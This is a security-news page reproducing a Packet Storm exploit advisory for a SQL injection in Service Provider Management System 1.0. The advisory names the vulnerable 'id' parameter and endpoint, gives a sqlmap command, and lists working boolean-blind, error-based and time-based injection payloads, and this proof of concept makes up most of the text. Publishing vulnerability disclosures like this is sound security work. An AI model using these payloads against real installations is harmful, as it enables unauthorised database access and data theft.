Security
Headlines
HeadlinesLatestCVEs

Headline

Service Provider Management System 1.0 SQL Injection

Service Provider Management System version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#windows#linux#php#auth
# Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the latest vulnerabilities in the underlying database.Endpoint: /php-spms/?page=services/view&id=2Vulnerable parameter: id (GET)2. Proof of Concept:----------------------Step 1 - By visiting the url:http://localhost/php-spms/?page=services/view&id=2 just add single quote toverify the SQL Injection.Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"-p id --dbms=mysqlSQLMap Response:----------------------Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECTCOUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution